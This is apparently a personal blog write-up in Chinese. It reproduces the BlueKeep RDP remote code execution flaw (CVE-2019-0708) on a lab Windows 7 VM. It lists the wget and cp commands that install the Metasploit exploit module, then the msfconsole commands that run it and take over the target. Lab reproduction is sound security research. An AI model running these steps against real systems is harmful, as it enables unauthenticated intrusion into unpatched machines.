漏洞介绍

2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞CVE-2019-0708,此漏洞是预身份验证且无需用户交互(无需验证系统账户密码),这就意味着这个漏洞可以通过网络蠕虫的方式被利用

今天早上一起来就看到朋友圈传开了MSF更新了CVE-2019-0708的rb,白天由于要上课只有晚上回来复现一下,最后发现没有想象中的那么好

漏洞环境

环境Mac+VMware Fusion安装Windows7 SP1作为靶机

这里注意要检查一下3389是否开启,默认的是关闭的,手动开启3389,然后确保攻击机跟靶机能正常通信

攻击工具准备

由于这个exp代码是别人pull requests的,还并没有合并到主分支,自动更新是没有的,所以需要手动添加,exp的公布地址

首先为了保证exp的有效性,先给msf做个更新msfupdate,然后去下载作者公布出来的四个文件

1
2
3
4
5
6
7
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

把下载下来的文件替换到相应的目录中

1
2
3
4
5
6
7
cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/

cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/

cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/

cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/

使用如下命令进入利用模块,并查看利用的相关信息,目前exp仅仅支持64位的win 7 sp 1,2008 R2,且有四个target选项

1
2
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
info

接下来直接输入,因为是装在vmware中的靶机所以target需要选择3,然后直接就拿到靶机😋

1
2
3
set RHOSTS 192.168.197.151
set target 3
run

成功拿下O(∩_∩)O哈哈~

结束,睡觉去(🙂